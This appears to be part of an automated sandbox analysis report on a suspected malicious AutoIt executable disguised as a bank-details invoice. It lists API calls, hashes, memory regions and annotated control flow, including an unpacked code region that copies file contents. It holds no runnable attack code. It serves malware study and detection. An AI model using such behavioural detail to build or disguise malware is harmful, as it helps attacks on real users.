                    • Opcode ID: f4e1079f36b5b78a01a7d430d225ac8bafe697caaac582e54468c999acf7308b
                    • Instruction ID: f7ebae158be1475f89e4db984e33c962f0e3c6276da8e7bf3ff60f9df3226a40
                    • Opcode Fuzzy Hash: f4e1079f36b5b78a01a7d430d225ac8bafe697caaac582e54468c999acf7308b
                    • Instruction Fuzzy Hash: 0E928F706083419FD724EF19C480B6BB7E1BF88708F14885EE98A8B392D779ED45CB56
                    APIs
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047E959
                    • timeGetTime.WINMM ref: 0047EBFA
                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047ED2E
                    • TranslateMessage.USER32(?), ref: 0047ED3F
                    • DispatchMessageW.USER32(?), ref: 0047ED4A
                    • LockWindowUpdate.USER32(00000000), ref: 0047ED79
                    • DestroyWindow.USER32 ref: 0047ED85
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0047ED9F
                    • Sleep.KERNEL32(0000000A), ref: 004E5270
                    • TranslateMessage.USER32(?), ref: 004E59F7
                    • DispatchMessageW.USER32(?), ref: 004E5A05
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004E5A19
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                    • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                    • API String ID: 2641332412-570651680
                    • Opcode ID: fd07bd893e266024b1d3124bc87a1aa4a52b790414129e8f5fdf876dff5119ae
                    • Instruction ID: 2b5d978f1fd4bf7926653307965461a03c6475c43bc1b369532c9642fdd513ff
                    • Opcode Fuzzy Hash: fd07bd893e266024b1d3124bc87a1aa4a52b790414129e8f5fdf876dff5119ae
                    • Instruction Fuzzy Hash: FF62B670504380DFD724DF26C885BAA77E5BF48308F0449AFF94A8B292D778D849CB5A
                    APIs
                    • ___createFile.LIBCMT ref: 004A5EC3
                    • ___createFile.LIBCMT ref: 004A5F04
                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 004A5F2D
                    • __dosmaperr.LIBCMT ref: 004A5F34
                    • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 004A5F47
                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 004A5F6A
                    • __dosmaperr.LIBCMT ref: 004A5F73
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 004A5F7C
                    • __set_osfhnd.LIBCMT ref: 004A5FAC
                    • __lseeki64_nolock.LIBCMT ref: 004A6016
                    • __close_nolock.LIBCMT ref: 004A603C
                    • __chsize_nolock.LIBCMT ref: 004A606C
                    • __lseeki64_nolock.LIBCMT ref: 004A607E
                    • __lseeki64_nolock.LIBCMT ref: 004A6176
                    • __lseeki64_nolock.LIBCMT ref: 004A618B
                    • __close_nolock.LIBCMT ref: 004A61EB
                      • Part of subcall function 0049EA9C: CloseHandle.KERNELBASE(00000000,0051EEF4,00000000,?,004A6041,0051EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0049EAEC
                      • Part of subcall function 0049EA9C: GetLastError.KERNEL32(?,004A6041,0051EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0049EAF6
                      • Part of subcall function 0049EA9C: __free_osfhnd.LIBCMT ref: 0049EB03
                      • Part of subcall function 0049EA9C: __dosmaperr.LIBCMT ref: 0049EB25
                      • Part of subcall function 00497C0E: __getptd_noexit.LIBCMT ref: 00497C0E
                    • __lseeki64_nolock.LIBCMT ref: 004A620D
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 004A6342
                    • ___createFile.LIBCMT ref: 004A6361
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 004A636E
                    • __dosmaperr.LIBCMT ref: 004A6375
                    • __free_osfhnd.LIBCMT ref: 004A6395
                    • __invoke_watson.LIBCMT ref: 004A63C3
                    • __wsopen_helper.LIBCMT ref: 004A63DD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                    • String ID: @
                    • API String ID: 3896587723-2766056989
                    • Opcode ID: 76b4fec0db37177676c5cce61bc6acd49d5b08a6a23231ed9f4e78215b95fef2
                    • Instruction ID: 6f16d0eca53d4e953d3c7db3bb47afc10054d51f6f2be3b6a2a4cfaa1571a95e
                    • Opcode Fuzzy Hash: 76b4fec0db37177676c5cce61bc6acd49d5b08a6a23231ed9f4e78215b95fef2
                    • Instruction Fuzzy Hash: 542234719046059BEF259F68CD45BBE7B21EB32324F29822BE9219B3D1C23D8D50C759

                    Control-flow Graph

                    APIs
                    • _wcscpy.LIBCMT ref: 004BFA96
                    • _wcschr.LIBCMT ref: 004BFAA4
                    • _wcscpy.LIBCMT ref: 004BFABB
                    • _wcscat.LIBCMT ref: 004BFACA
                    • _wcscat.LIBCMT ref: 004BFAE8
                    • _wcscpy.LIBCMT ref: 004BFB09
                    • __wsplitpath.LIBCMT ref: 004BFBE6
                    • _wcscpy.LIBCMT ref: 004BFC0B
                    • _wcscpy.LIBCMT ref: 004BFC1D
                    • _wcscpy.LIBCMT ref: 004BFC32
                    • _wcscat.LIBCMT ref: 004BFC47
                    • _wcscat.LIBCMT ref: 004BFC59
                    • _wcscat.LIBCMT ref: 004BFC6E
                      • Part of subcall function 004BBFA4: _wcscmp.LIBCMT ref: 004BC03E
                      • Part of subcall function 004BBFA4: __wsplitpath.LIBCMT ref: 004BC083
                      • Part of subcall function 004BBFA4: _wcscpy.LIBCMT ref: 004BC096
                      • Part of subcall function 004BBFA4: _wcscat.LIBCMT ref: 004BC0A9
                      • Part of subcall function 004BBFA4: __wsplitpath.LIBCMT ref: 004BC0CE
                      • Part of subcall function 004BBFA4: _wcscat.LIBCMT ref: 004BC0E4
                      • Part of subcall function 004BBFA4: _wcscat.LIBCMT ref: 004BC0F7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                    • String ID: >>>AUTOIT SCRIPT<<<$t2R
                    • API String ID: 2955681530-151873073
                    • Opcode ID: c31aee72f7804df038a7783b1cfc2d3386f165faa01c79fd118f191411eb22a2
                    • Instruction ID: 0758a785a0176a4ff91a829bac642e68c1ba5911cdeb8b7879023c35dae63b76
                    • Opcode Fuzzy Hash: c31aee72f7804df038a7783b1cfc2d3386f165faa01c79fd118f191411eb22a2
                    • Instruction Fuzzy Hash: 6A91A371504205AFDB20EB55C851EDBB7E8BF84314F00496EF94D97291DB38FA48CB99

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00473F86
                    • RegisterClassExW.USER32(00000030), ref: 00473FB0
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00473FC1
                    • InitCommonControlsEx.COMCTL32(?), ref: 00473FDE
                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00473FEE
                    • LoadIconW.USER32(000000A9), ref: 00474004
                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00474013
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                    • API String ID: 2914291525-1005189915
                    • Opcode ID: 433446085b86216f9da4348957797ee4d975d292f47685dc387446d19bf1c5cd
                    • Instruction ID: a56db41af9fc764c62a1d3a812c0e2c44befc6e952c930ffaf6758ee0fb52bef
                    • Opcode Fuzzy Hash: 433446085b86216f9da4348957797ee4d975d292f47685dc387446d19bf1c5cd
                    • Instruction Fuzzy Hash: F021B4B5D00618AFDB009FE4E889B9DBBB5FB18704F00412AF511A62A0D7B44554DF99

                    Control-flow Graph

                    APIs
                      • Part of subcall function 004BBDB4: __time64.LIBCMT ref: 004BBDBE
                      • Part of subcall function 00474517: _fseek.LIBCMT ref: 0047452F
                    • __wsplitpath.LIBCMT ref: 004BC083
                      • Part of subcall function 00491DFC: __wsplitpath_helper.LIBCMT ref: 00491E3C
                    • _wcscpy.LIBCMT ref: 004BC096
                    • _wcscat.LIBCMT ref: 004BC0A9
                    • __wsplitpath.LIBCMT ref: 004BC0CE
                    • _wcscat.LIBCMT ref: 004BC0E4
                    • _wcscat.LIBCMT ref: 004BC0F7
                    • _wcscmp.LIBCMT ref: 004BC03E
                      • Part of subcall function 004BC56D: _wcscmp.LIBCMT ref: 004BC65D
                      • Part of subcall function 004BC56D: _wcscmp.LIBCMT ref: 004BC670
                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 004BC2A1
                    • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004BC338
                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 004BC34E
                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004BC35F
                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 004BC371
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                    • String ID:
                    • API String ID: 2378138488-0
                    • Opcode ID: d342150d949d26e4757b92f97783c11c8ec82502ba97fe01225993300b4c1240
                    • Instruction ID: 6875bc50a8fdd83b27afaf77d575f41dd135e750d2391069f7e49c900cce24f9
                    • Opcode Fuzzy Hash: d342150d949d26e4757b92f97783c11c8ec82502ba97fe01225993300b4c1240
                    • Instruction Fuzzy Hash: E2C13CB1D00129AADF11DFA5CC81EEEBBBDAF49314F0040ABF609E6151DB749A448F65

                    Control-flow Graph

                    APIs
                    • DefWindowProcW.USER32(?,?,?,?), ref: 004737B3
                    • KillTimer.USER32(?,00000001), ref: 004737DD
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00473800
                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0047380B
                    • CreatePopupMenu.USER32 ref: 0047381F
                    • PostQuitMessage.USER32(00000000), ref: 0047382E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                    • String ID: TaskbarCreated
                    • API String ID: 129472671-2362178303
                    • Opcode ID: b250293bd631434db8553aa22fc8355c233fd7a6dfe108ed7d3ccf9edc827d3a
                    • Instruction ID: e712d0284a6554568185fff116707f5743be3156c90d3a519e4738d706990427
                    • Opcode Fuzzy Hash: b250293bd631434db8553aa22fc8355c233fd7a6dfe108ed7d3ccf9edc827d3a
                    • Instruction Fuzzy Hash: F04125F410054AA7DB186F389C4ABFA3695F710302F04C12BF90AD22A0DB6C9951B66E

                    Control-flow Graph

                    APIs
                    • GetSysColorBrush.USER32(0000000F), ref: 00473E79
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00473E88
                    • LoadIconW.USER32(00000063), ref: 00473E9E
                    • LoadIconW.USER32(000000A4), ref: 00473EB0
                    • LoadIconW.USER32(000000A2), ref: 00473EC2
                      • Part of subcall function 00474024: LoadImageW.USER32(00470000,00000063,00000001,00000010,00000010,00000000), ref: 00474048
                    • RegisterClassExW.USER32(?), ref: 00473F30
                      • Part of subcall function 00473F53: GetSysColorBrush.USER32(0000000F), ref: 00473F86
                      • Part of subcall function 00473F53: RegisterClassExW.USER32(00000030), ref: 00473FB0
                      • Part of subcall function 00473F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00473FC1
                      • Part of subcall function 00473F53: InitCommonControlsEx.COMCTL32(?), ref: 00473FDE
                      • Part of subcall function 00473F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00473FEE
                      • Part of subcall function 00473F53: LoadIconW.USER32(000000A9), ref: 00474004
                      • Part of subcall function 00473F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00474013
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                    • String ID: #$0$AutoIt v3
                    • API String ID: 423443420-4155596026
                    • Opcode ID: a5b39152dddf20fc4eddc11a08231615b0f533d058cc20269965a0148eb78c3f
                    • Instruction ID: f8da7820810fe74454faa2ff9386bd9eafab7e8cf38970e7b11d6262dad75b39
                    • Opcode Fuzzy Hash: a5b39152dddf20fc4eddc11a08231615b0f533d058cc20269965a0148eb78c3f
                    • Instruction Fuzzy Hash: 0D2132B0D00704ABCB04DFB9ED49A99BFF5FB58314F10812AE218A73A0D7755648EF99

                    Control-flow Graph (rendered figure, not reproduced; the executed/not-executed node colouring is lost). Graph for 0049ACB3-0049AF57: internal calls to 00496AC0, 00497CF4, 00496986, 0049E880, 00496B05 and 0049AF58; GetStartupInfoW, then a first loop calling GetFileType and InitializeCriticalSectionAndSpinCount, then a second loop calling GetStdHandle, GetFileType and InitializeCriticalSectionAndSpinCount. This is the MSVC C runtime's stdio handle initialisation (_ioinit), AutoIt runtime boilerplate rather than script logic.
                    APIs
                    • __lock.LIBCMT ref: 0049ACC1
                      • Part of subcall function 00497CF4: __mtinitlocknum.LIBCMT ref: 00497D06
                      • Part of subcall function 00497CF4: EnterCriticalSection.KERNEL32(00000000,?,00497ADD,0000000D), ref: 00497D1F
                    • __calloc_crt.LIBCMT ref: 0049ACD2
                      • Part of subcall function 00496986: __calloc_impl.LIBCMT ref: 00496995
                      • Part of subcall function 00496986: Sleep.KERNEL32(00000000,000003BC,0048F507,?,0000000E), ref: 004969AC
                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 0049ACED
                    • GetStartupInfoW.KERNEL32(?,00526E28,00000064,00495E91,00526C70,00000014), ref: 0049AD46
                    • __calloc_crt.LIBCMT ref: 0049AD91
                    • GetFileType.KERNEL32(00000001), ref: 0049ADD8
                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0049AE11
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                    • String ID:
                    • API String ID: 1426640281-0
                    • Opcode ID: 5f81094e6d6ac361f25b1ba00d695876321636ff470af10975d06a0701f04012
                    • Instruction ID: 3d23bcc5cb87a5500d4408298a73b2d5572858e1d4b33d600e0fd20b5b08157f
                    • Opcode Fuzzy Hash: 5f81094e6d6ac361f25b1ba00d695876321636ff470af10975d06a0701f04012
                    • Instruction Fuzzy Hash: 0081C2719053558FDF14CF68C8845AABFF1AF05324B24427EE4A6AB3D1C7389813CB9A

                    Control-flow Graph (rendered figure, not reproduced; the executed/not-executed node colouring is lost). Graph for 01340648-01340800: call 01340548, CreateFileW, VirtualAlloc, a second CreateFileW, ReadFile, WriteFile, then CloseHandle and VirtualFree, with every failure branch converging on 013407FC. The sequence opens one file, allocates a buffer, opens a second file, reads from one and writes to the other; it runs from the region at 0133F000 that the report marks "based on PE: false", so this is unpacked or injected code rather than the AutoIt image.
                    APIs
                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0134068D
                    Memory Dump Source
                    • Source File: 00000000.00000002.2167173105.000000000133F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0133F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_133f000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                    • Instruction ID: 55b6b195f81e1e7d680fa70e57273b08981d29e0e125bd257a5283f96b0af14a
                    • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                    • Instruction Fuzzy Hash: B8510875B50208FBEF24DFA4CC49FEE7BB8AF48714F108554F71AEA180DA74A6448B60

                    Control-flow Graph (rendered figure, not reproduced; the executed/not-executed node colouring is lost). Graph for 004749FB-00474A2F and 004E41CC-004E424F (the function is split across two code ranges): call 0047BCCE, RegOpenKeyExW, RegQueryValueExW (size query), calls 0048F4EA and 004747B7, RegQueryValueExW (data read), then call 00476A63 and/or call 004747E2, and RegCloseKey. The two RegQueryValueExW calls in the API list below follow the usual size-then-data pattern (first with a NULL buffer, then with the allocated one); hKey 80000001 is HKEY_CURRENT_USER, so this is the AutoIt interpreter reading HKCU\Software\AutoIt v3\AutoIt\Include, its user-configurable include path.
                    APIs
                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00474A1D
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 004E41DB
                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 004E421A
                    • RegCloseKey.ADVAPI32(?), ref: 004E4249
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: QueryValue$CloseOpen
                    • String ID: Include$Software\AutoIt v3\AutoIt
                    • API String ID: 1586453840-614718249
                    • Opcode ID: 4c3b1b12d051afc2dc96ad8e86b0fd7e015765ce34a9abe1d9e051bf4268b74b
                    • Instruction ID: 62ac2336300a2d15db588f556fa428db226fdbe2af275720d5ab33eaf81a8a78
                    • Opcode Fuzzy Hash: 4c3b1b12d051afc2dc96ad8e86b0fd7e015765ce34a9abe1d9e051bf4268b74b
                    • Instruction Fuzzy Hash: 82113D71A00109BFEB04ABA5CD86DFF7BBCEF44348F00406AB506D6191EB759E05D768

                    Control-flow Graph (rendered figure, not reproduced). Single basic block 004736B8-00473728: CreateWindowExW twice, ShowWindow twice. From the API list below, the first call creates the "AutoIt v3" top-level window (class and title both "AutoIt v3", style 00CF0000 = WS_OVERLAPPEDWINDOW, position 80000000 = CW_USEDEFAULT, 300 x 100), the second a child "edit" control (style 50B008C4 = WS_CHILD|WS_VISIBLE|WS_BORDER|WS_VSCROLL|WS_HSCROLL|ES_MULTILINE|ES_AUTOVSCROLL|ES_AUTOHSCROLL|ES_READONLY). The "AutoIt v3" window class is a reliable runtime marker for compiled AutoIt executables.
                    APIs
                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004736E6
                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00473707
                    • ShowWindow.USER32(00000000,?,?,?,?,00473AA3,?), ref: 0047371B
                    • ShowWindow.USER32(00000000,?,?,?,?,00473AA3,?), ref: 00473724
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: Window$CreateShow
                    • String ID: AutoIt v3$edit
                    • API String ID: 1584632944-3779509399
                    • Opcode ID: f33d3d7a9ea3ad3ab2121b0cf060fdd454c9b96bb9447f3fa001ce71684a8ca7
                    • Instruction ID: fb3fe256dfc55542bb23a1027339f86e2f15ec6d5d148948bb36fb72e8fa6fa8
                    • Opcode Fuzzy Hash: f33d3d7a9ea3ad3ab2121b0cf060fdd454c9b96bb9447f3fa001ce71684a8ca7
                    • Instruction Fuzzy Hash: 95F0D071A406D47BD73557676C4CE772E7ED7D6F20B00401ABA04972A0C6650899EAB8

                    Control-flow Graph (rendered figure, not reproduced)

                    APIs
                      • Part of subcall function 00475374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00531148,?,004761FF,?,00000000,00000001,00000000), ref: 00475392
                      • Part of subcall function 004749FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00474A1D
                    • _wcscat.LIBCMT ref: 004E2D80
                    • _wcscat.LIBCMT ref: 004E2DB5
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166611300.0000000000534000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_confirm bank details invoice.jbxd
                    Similarity
                    • API ID: _wcscat$FileModuleNameOpen
                    • String ID: 8!S$\$\Include\
                    • API String ID: 3592542968-3708070565
                    • Opcode ID: 32064c9d60affcbafe64fa5a8e732c664ab2b169bcf3fa765d1e869ada7aed94
                    • Instruction ID: 1bce59ee6212c67b7ed9206d73ba84010ca981adc96c135045d43c3d43dabc0e
                    • Opcode Fuzzy Hash: 32064c9d60affcbafe64fa5a8e732c664ab2b169bcf3fa765d1e869ada7aed94
                    • Instruction Fuzzy Hash: 12515E714047409BC714EF56EA818AAB7F8FF69304F40852FF64993360EB78990CDB5A
                    APIs
                    • _memset.LIBCMT ref: 0047522F
                    • _wcscpy.LIBCMT ref: 00475283
                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00475293
                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 004E3CB0
                    Memory Dump Source
                    • Source File: 00000000.00000002.2166433642.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.2166401001.0000000000470000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.00000000004FD000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166533470.000000000051E000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.2166592073.000000000052A000.00000004.00000001.01000000.00000003.sdmp
